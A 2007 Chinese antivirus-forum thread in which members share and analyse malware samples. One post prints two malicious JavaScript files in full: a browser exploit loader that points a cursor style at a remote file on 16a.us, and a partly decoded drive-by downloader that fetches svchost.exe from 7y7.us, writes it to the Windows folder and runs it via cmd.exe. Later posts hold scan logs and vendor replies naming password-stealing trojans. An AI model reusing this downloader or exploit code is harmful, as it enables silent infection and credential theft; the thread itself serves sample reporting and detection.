5/23 21:00上传，还是svchost！（可能流行的样本）

显示全部楼层 · 发表于 2007-5-23 22:38:03

原帖由 zzh161 于 2007-5-23 22:34 发表
趋势杀了第二个

有两个js，还有个呢

显示全部楼层 · 发表于 2007-5-23 22:45:42

那两个JS文件貌似是很久之前的东西了

new.js

info = "<head>" +"\n"+
"<meta http-equiv="Content-Language" content="zh-cn">" +"\n"+
"</head>" +"\n"+
"<div id="new_content_jp" style="display:none"></div>" +"\n"+
"<div id="new_content_jp" style="display:none"></div>" +"\n"+
"<script language="javascript" >" +"\n"+
"function checkIE(){" +"\n"+
"var jpDiv = document.getElementById("new_content_jp")" +"\n"+
"var a=navigator.userAgent.toLowerCase();" +"\n"+
"if (navigator.appVersion.indexOf(\'MSIE\')!=-1){" +"\n"+
" version=parseFloat(navigator.appVersion.split(\'MSIE\')[1])" +"\n"+
" if (version>5 && version<=7){" +"\n"+
" w2k = ((a.indexOf(\'windows nt 5.0\')!=-1) || (a.indexOf(\'windows 2000\')!=-1));" +"\n"+
" wxp = ((a.indexOf(\'windows nt 5.1\')!=-1) || (a.indexOf(\'windows xp\')!=-1));" +"\n"+
" w2k3 = ((a.indexOf(\'windows nt 5.2\')!=-1) || (a.indexOf(\'windows 2003\')!=-1));" +"\n"+
"" +"\n"+
" if(wxp)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\">";" +"\n"+
" if(w2k)jpDiv.innerHTML = "<div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\"><div style=\\"cursor: url(http:\\/\\/16a.us\\/oK\\/MyTest2.jpg)\\">";" +"\n"+
" }" +"\n"+
"" +"\n"+
"}" +"\n"+
"" +"\n"+
"}" +"\n"+
"setTimeout("checkIE();",300);" +"\n"+
"</script>" +"\n"+
"<script>window.onerror=function(){return true;}</script>"
document.write(info)

复制代码

http://16a.us/oK/MyTest2.jpg

Vernum.js，只把主要的16进制转换了一下

document.writeln("<script>window.onerror=function(){return true;}<\/script>");
document.writeln("<script>");
document.writeln("DZ='http://7y7.us/oK/svchost.exe';");
document.writeln("function GnMs(n) ");
document.writeln("{ ");
document.writeln(" var numberMs = Math.random()*n;");
document.writeln(" return \'clssid'+Math.round(numberMs)+\'.tmp\';");
document.writeln("} ");
document.writeln(" try ");
document.writeln("{");
document.writeln(" var Bf=document.createElement("\\x6F\\x62\\x6A\\x65\\x63\\x74");");
document.writeln(" Bf.setAttribute("classid");");
document.writeln(" var Kx=Bf.CreateObject("\\x4D\\x69\\x63\\x72\\x6F\\x73\\x6F\\x66\\x74\\x2E\\x58"+"\\x4D\\x4C\\x48\\x54\\x54\\x50","");");
document.writeln(" var AS=Bf.CreateObject("\\x41\\x64\\x6F\\x64\\x62\\x2E\\x53\\x74\\x72\\x65\\x61\\x6D","");");
document.writeln(" AS.type=1;");
document.writeln(" Kx.open("\\x47\\x45\\x54", DZ,0);");
document.writeln(" Kx.send();");
document.writeln(" Ns1=GnMs(9999);");
document.writeln(" var cF=Bf.CreateObject("\\x53\\x63\\x72\\x69\\x70\\x74\\x69\\x6E\\x67\\x2E\\x46\\x69\\x6C\\x65\\x53\\x79\\x73\\x74\\x65\\x6D\\x4F\\x62\\x6A\\x65\\x63\\x74","");");
document.writeln(" var NsTmp=cF.GetSpecialFolder(0); Ns1= cF.BuildPath(NsTmp,Ns1); AS.Open();AS.Write(Kx.responseBody);");
document.writeln(" AS.SaveToFile(Ns1,2); AS.Close(); var q=Bf.CreateObject("\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E","");");
document.writeln(" ok1=cF.BuildPath(NsTmp+\'\\x5C\\x5C\\x73\\x79\\x73\\x74\\x65\\x6D\\x33\\x32\',\'\\x63\\x6D\\x64\\x2E\\x65\\x78\\x65\');");
document.writeln(" q.SHeLLExecute(ok1,\'\\x20\\x2F\\x63 \'+Ns1,"","\\x6F\\x70\\x65\\x6E",0);");
document.writeln("} ");
document.writeln(" catch(MsI) { MsI=1; }");
document.writeln("<\/script>")

复制代码

http://7y7.us/oK/svchost.exe

[ 本帖最后由 dikex 于 2007-5-23 22:47 编辑 ]

显示全部楼层 · 发表于 2007-5-23 22:57:18

楼主...我在影子下运行好像没事..

svchost.rar--已上报..未回

virus.rar--有回覆

filename:  virus.rar
machine: Machine
result: This file is clean

filename: New.js
machine: Machine
result: This file is clean

filename: msg-26080-1.txt
machine: Machine
result: This file is clean

filename: Vernum.js
machine: Machine
result: This file is clean

filename: msg-26080-2.txt
machine: Machine
result: This file is clean

Developer notes:
virus.rar is a container file of type  RAR
New.js is a container file of type  MIME. This file is contained by
virus.rar
msg-26080-1.txt  is a clean file.  This file is contained by  New.js
Vernum.js is a container file of type  MIME. This file is contained by
virus.rar
msg-26080-2.txt  is a clean file.  This file is contained by  Vernum.js

We have determined that no virus exists on the samples provided.

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

-----------------------------------------------------------------------
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/

显示全部楼层 · 发表于 2007-5-23 23:10:53

下载的多个病毒也上传好了

显示全部楼层 · 发表于 2007-5-23 23:17:59

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\virus_download.rar'
C:\Documents and Settings\morgan\My Documents\
  virus_download.rar
[0] Archive type: RAR
--> New.js
      [DETECTION] Contains signature of the Java script virus JS/Crypt.Agent
      [WARNING] Infected files in archives cannot be repaired!
--> Vernum.js
--> srogm.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> spglsdr.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> IEXPLORE.EXE
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> svchost(1).exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> ctfmon.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> smss.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> conime.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> csrss.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> svchost32.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> mmc.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> stpgldk.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> services.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
--> copypfh.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [WARNING] Infected files in archives cannot be repaired!
      [WARNING] The file was ignored!
Begin scan in 'C:\Documents and Settings\morgan\My Documents\virus.rar'
C:\Documents and Settings\morgan\My Documents\
  virus.rar
[0] Archive type: RAR
--> New.js
      [DETECTION] Contains signature of the Java script virus JS/Crypt.Agent
      [WARNING] Infected files in archives cannot be repaired!
--> Vernum.js
      [WARNING] The file was ignored!

End of the scan: 2007年5月23日  08:16
Used time: 00:12 min

The scan has been done completely.

   0 Scanning directories
   19 Files were scanned
   15 viruses and/or unwanted programs were found
   0 classified as suspicious:
   0 files were deleted
   0 files were repaired
   0 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   4 Files not concerned
   2 Archives were scanned
   17 Warnings
   0 Notes
   0 Hidden objects were found

扫描日志
NOD32版本 2285 (20070522) NT
命令行： C:\Documents and Settings\morgan\My Documents\ ?
?virus.rar C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar
正在检查NOD32.EXE文件的CRC：状态正常
D:\Eset\nod32.exe - 是正常的
扫描系统内存中：没有进行 (选项已关闭)
扫描MBR及引导区中：没有进行 (选项已关闭)
日期： 23.5.2007  时间：08:17:13
已关闭反隐藏功能.
已扫描的磁盘，文件夹及文件：C:\Documents and Settings\ ?
?morgan\My Documents\virus.rar; C:\Documents and  ?
?Settings\morgan\My Documents\virus_download.rar
C:\Documents and Settings\morgan\My Documents\virus.rar  ?
?>>RAR >>New.js - 是正常的
C:\Documents and Settings\morgan\My Documents\virus.rar  ?
?>>RAR >>Vernum.js - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>New.js - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>Vernum.js - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>srogm.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>spglsdr.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>IEXPLORE.EXE - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>svchost(1).exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>ctfmon.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>smss.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>conime.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>csrss.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>svchost32.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>mmc.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>stpgldk.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>services.exe - 是正常的
C:\Documents and Settings\morgan\My Documents\ ?
?virus_download.rar >>RAR >>copypfh.exe - 是正常的
已扫描的文件数目：17
已发现的病毒数目：0
完成时间： 08:17:22 总扫描时间：9 秒 (00:00:09)

[Scan path] C:\Documents and Settings\morgan\My Documents\virus_download.rar
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\New.js - Ok
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\Vernum.js - Ok
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\srogm.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\spglsdr.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\IEXPLORE.EXE infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\svchost(1).exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\ctfmon.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\smss.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\conime.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\csrss.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\svchost32.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\mmc.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\stpgldk.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\services.exe infected with Trojan.PWS.Wsgame
>C:\Documents and Settings\morgan\My Documents\virus_download.rar\copypfh.exe infected with Trojan.PWS.Wsgame
C:\Documents and Settings\morgan\My Documents\virus_download.rar - archive contains infected objects

[Scan path] C:\Documents and Settings\morgan\My Documents\virus.rar
>C:\Documents and Settings\morgan\My Documents\virus.rar\New.js - Ok
>C:\Documents and Settings\morgan\My Documents\virus.rar\Vernum.js - Ok
C:\Documents and Settings\morgan\My Documents\virus.rar - Ok

-----------------------------------------------------------------------------
Scan statistics
-----------------------------------------------------------------------------
Objects scanned: 19
Infected objects found: 13
Objects with modifications found: 0
Suspicious objects found: 0
Adware programs found: 0
Dialer programs found: 0
Joke programs found: 0
Riskware programs found: 0
Hacktool programs found: 0
Objects cured: 0
Objects deleted: 0
Objects renamed: 0
Objects moved: 0
Objects ignored: 0
Scan speed: 203 Kb/s
Scan time: 00:00:01

显示全部楼层 · 发表于 2007-5-23 23:18:56

mytest2.rar---铁克报

virus_download.rar--上报中

显示全部楼层 · 发表于 2007-5-23 23:29:36

NOD32 全部就只杀了 new.js 下的那个 ANI ...
另一个JS下的svchost 挂了..

svchost下的那些 NOD32也都挂了 ..
投降了..

显示全部楼层 · 发表于 2007-5-23 23:45:22

virus_download.rar回覆...分成2个rar档上报..
病毒定义码5/22..明天再试

filename:  0523v1.rar
machine: Machine
result: See the developer notes

filename: ctfmon.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: services.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: csrss.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: mmc.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: copypfh.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: IEXPLORE.EXE
machine: Machine
result: This file is detected as W32.Drom.

filename: conime.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: New.js
machine: Machine
result: This file is clean

filename: msg-26320-1.txt
machine: Machine
result: This file is clean

Developer notes:
0523v1.rar is an infected container file of type  RAR
ctfmon.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by 0523v1.rar
services.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by 0523v1.rar
csrss.exe is non-repairable threat. Please delete this file and replace
it if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by 0523v1.rar
mmc.exe is non-repairable threat. Please delete this file and replace
it if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by 0523v1.rar
copypfh.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by 0523v1.rar
IEXPLORE.EXE is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by 0523v1.rar
conime.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by 0523v1.rar
New.js is a container file of type  MIME. This file is contained by
0523v1.rar
msg-26320-1.txt  is a clean file.  This file is contained by  New.js

Symantec Security Response has determined that the sample(s) that you
provided are infected with a virus, worm, or Trojan. We have created
RapidRelease definitions that will detect this threat. Please follow the
instruction at the end of this email message to download and install the
latest RapidRelease definitions.
Virus definition detail:

Sequence Number:       68861
Defs Version:             90523w
Extended Version:       05/23/2007 rev.23

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

-----------------------------------------------------------------------
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/

--------------------------------------------

filename:  0523v2.rar
machine: Machine
result: See the developer notes

filename: srogm.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: stpgldk.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: svchost32.exe
machine: Machine
result: See the developer notes

filename: svchost(1).exe
machine: Machine
result: See the developer notes

filename: spglsdr.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: smss.exe
machine: Machine
result: This file is detected as W32.Drom.

filename: Vernum.js
machine: Machine
result: This file is clean

filename: msg-3188-3.txt
machine: Machine
result: This file is clean

Developer notes:
0523v2.rar is a container file of type  RAR
srogm.exe is non-repairable threat. Please delete this file and replace
it if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by 0523v2.rar
stpgldk.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by 0523v2.rar
svchost32.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file
is contained by 0523v2.rar
svchost(1).exe Our automation was unable to identify any malicious
content in this submission.
The file will be stored for further human analysis  This file is
contained by 0523v2.rar
spglsdr.exe is non-repairable threat. Please delete this file and
replace it if necessary. Please follow the instruction at the end of this
email message to install the latest available definitions.  This file is
contained by 0523v2.rar
smss.exe is non-repairable threat. Please delete this file and replace
it if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by 0523v2.rar
Vernum.js is a container file of type  MIME. This file is contained by
0523v2.rar
msg-3188-3.txt  is a clean file.  This file is contained by  Vernum.js

Symantec Security Response has determined that the sample(s) that you
provided are infected with a virus, worm, or Trojan. We have created
RapidRelease definitions that will detect this threat. Please follow the
instruction at the end of this email message to download and install the
latest RapidRelease definitions.
Virus definition detail:

Sequence Number:       68861
Defs Version:             90523w
Extended Version:       05/23/2007 rev.23

Should you have any questions about your submission, please contact
your regional technical support from the Symantec website and give them
the tracking number in the subject of this message.

-----------------------------------------------------------------------
This message was generated by Symantec Security Response automation.

For USA:
For electronic support options, Symantec provides On-Line Services at
http://www.symantec.com/techsupp/

--------------------------------------------

[ 本帖最后由 playx 于 2007-5-24 00:05 编辑 ]

显示全部楼层 · 发表于 2007-5-24 01:12:29

svchost.rar 病毒码更新已可查杀...不好意思不是来乱

..企业版更新晚一天

显示全部楼层 · 发表于 2007-5-24 16:43:19

[ 本帖最后由鼻耳盖子于 2007-5-24 16:44 编辑 ]

[病毒样本] 5/23 21:00上传，还是svchost！（可能流行的样本）

微点都拦了

本帖子中包含更多资源